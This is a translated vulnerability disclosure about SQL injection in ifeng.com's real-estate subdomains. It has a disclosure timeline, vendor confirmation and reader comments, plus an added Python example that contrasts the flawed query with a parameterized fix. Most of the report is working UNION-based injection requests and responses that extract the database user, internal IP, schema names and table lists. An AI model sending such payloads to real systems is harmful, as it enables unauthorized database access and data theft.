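2015-10-26: Details reported to the vendor; awaiting vendor handling
2015-10-26: Vendor confirmed; details disclosed to the vendor only
2015-11-05: Details disclosed to core white hats and experts in related fields
2015-11-15: Details disclosed to regular white hats
2015-11-25: Details disclosed to trainee white hats
2015-12-10: Details disclosed to the public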
The subdomains of house.ifeng.com are all vulnerable to SQL injection; SQL queries can be run directly.
GET /sale/search/guide?city=17649&prefix=%e4%b8%ad%e9%93%81%c2%b7%e5%ad%90%e6%82%a6%e5%8f%b0'+UNION+ALL+SELECT+NULL,NULL,user(),NULL--+&jsoncallback=jQuery17207547671820502728_1445636962245&type=undefined HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://hn.house.ifeng.com/column
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate
Host: hn.house.ifeng.com
Cookie: ifh_site=17649%2Chn; city_redirected=13

HTTP/1.1 200 OK
Server: ifengweb/1.2.8
Date: Sat, 24 Oct 2015 09:38:52 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Content-Length: 141

jQuery17207547671820502728_1445636962245([{"data":"\u60a8\u8981\u627e\u7684\u662f\u4e0d\u662f\uff1aapphouse_rw@10.129.2.150","theurl":null}])

GET /sale/search/guide?city=17649&prefix=%e4%b8%ad%e9%93%81%c2%b7%e5%ad%90%e6%82%a6%e5%8f%b0'+UNION+ALL+SELECT+NULL,NULL,(select+count(*)FROM+information_schema.schemata),NULL--+&jsoncallback=jQuery17207547671820502728_1445636962245&type=undefined HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5

jQuery17207547671820502728_1445636962245([{"data":"\u60a8\u8981\u627e\u7684\u662f\u4e0d\u662f\uff1a5","theurl":null}])

GET /sale/search/guide?city=17649&prefix=%e4%b8%ad%e9%93%81%c2%b7%e5%ad%90%e6%82%a6%e5%8f%b0'+UNION+ALL+SELECT+NULL,NULL,(select+distinct+group_concat(0x7e,schema_name,0x7e)+FROM+information_schema.schemata),NULL--+&jsoncallback=jQuery17207547671820502728_1445636962245&type=undefined HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://hn.house.ifeng.com/column
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate
Host: hn.house.ifeng.com
Cookie: ifh_site=17649%2Chn; city_redirected=13

jQuery17207547671820502728_1445636962245([{"data":"\u60a8\u8981\u627e\u7684\u662f\u4e0d\u662f\uff1a~information_schema~,~app_house~,~estate_house~,~test~","theurl":null}])
GET /sale/search/guide?city=17649&prefix=%e4%b8%ad%e9%93%81%c2%b7%e5%ad%90%e6%82%a6%e5%8f%b0'+UNION+ALL+SELECT+NULL,NULL,(SELECT+group_concat(table_name)+FROM+information_schema.tables+WHERE+table_schema='app_house'),NULL--+&jsoncallback=jQuery17207547671820502728_1445636962245&type=undefined HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://hn.house.ifeng.com/column
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate
Host: gz.house.ifeng.com
Cookie: ifh_site=17649%2Chn; city_redirected=13

HTTP/1.1 200 OK
Server: ifengweb/1.2.8
Date: Sat, 24 Oct 2015 10:59:55 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Content-Length: 458

jQuery17207547671820502728_1445636962245([{"data":"\u60a8\u8981\u627e\u7684\u662f\u4e0d\u662f\uff1aacl_func,acl_group,acl_group_func,acl_module,acl_page,acl_permission,acl_role,acl_role_permission,acl_user_role,cache,city_phone,fyh_activity,fyh_game_egg,fyh_game_egg_prize,fyh_game_egg_prizedetail,fyh_game_egg_user,fyh_log,fyh_phone,fyh_pic,fyh_special,fyh_user,fyh_user_activity,house_acl_user,house_menu,lp_apply,lp_area,lp_area_vw,lp_ci","theurl":null}])
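The string-concatenation flaw behind the requests above, next to a parameterized form, as an added example that is not part of the original report or the site's code. The table layout, function names and sample rows are constructed, SQLite stands in for the site's database, and the four-column query mirrors the four-column UNION shown on the page.

```python
import sqlite3

# Constructed payload with the same shape as the report's: close the quote,
# append a four-column UNION, comment out the remainder of the statement.
PAYLOAD = "中铁·子悦台' UNION ALL SELECT NULL,NULL,v,NULL FROM secret-- "


def make_db():
    """In-memory stand-in for the suggestion table (schema is an assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE estate (id INTEGER, city INTEGER, name TEXT, url TEXT)")
    db.execute("CREATE TABLE secret (v TEXT)")
    db.executemany(
        "INSERT INTO estate VALUES (?,?,?,?)",
        [(1, 17649, "中铁·子悦台", "/a"), (2, 17649, "100%_海景", "/b")],
    )
    db.execute("INSERT INTO secret VALUES ('db-user@host')")  # constructed value
    return db


def suggest_vulnerable(db, city, prefix):
    # 'Before': prefix is pasted into the SQL text, so a quote inside it ends
    # the string literal and everything after it is parsed as SQL.
    sql = ("SELECT id, city, name, url FROM estate "
           "WHERE city = %d AND name LIKE '%s%%'" % (int(city), prefix))
    return [row[2] for row in db.execute(sql)]


def suggest_fixed(db, city, prefix):
    # 'After': both values are bound parameters, so prefix is only ever data.
    # LIKE metacharacters are escaped so user input cannot widen the match.
    escaped = prefix.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = ("SELECT id, city, name, url FROM estate "
           "WHERE city = ? AND name LIKE ? ESCAPE '\\'")
    return [row[2] for row in db.execute(sql, (int(city), escaped + "%"))]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", suggest_vulnerable(db, 17649, PAYLOAD))
    print("fixed:     ", suggest_fixed(db, 17649, PAYLOAD))
    print("fixed, normal prefix:", suggest_fixed(db, 17649, "中铁"))
```

The vendor's reply on this page says one application serves all the hostnames, so the change belongs in that one query path.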
By an incomplete count, the following sites are affected by this vulnerability:
Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-10-26 15:45
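Thank you very much for your help with ifeng.com's information security. However, this is a single application, wildcard-resolved across a group of services, not "hundreds of websites".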
None yet
Granny Wang is here to follow this
The vendor confirmed in seconds!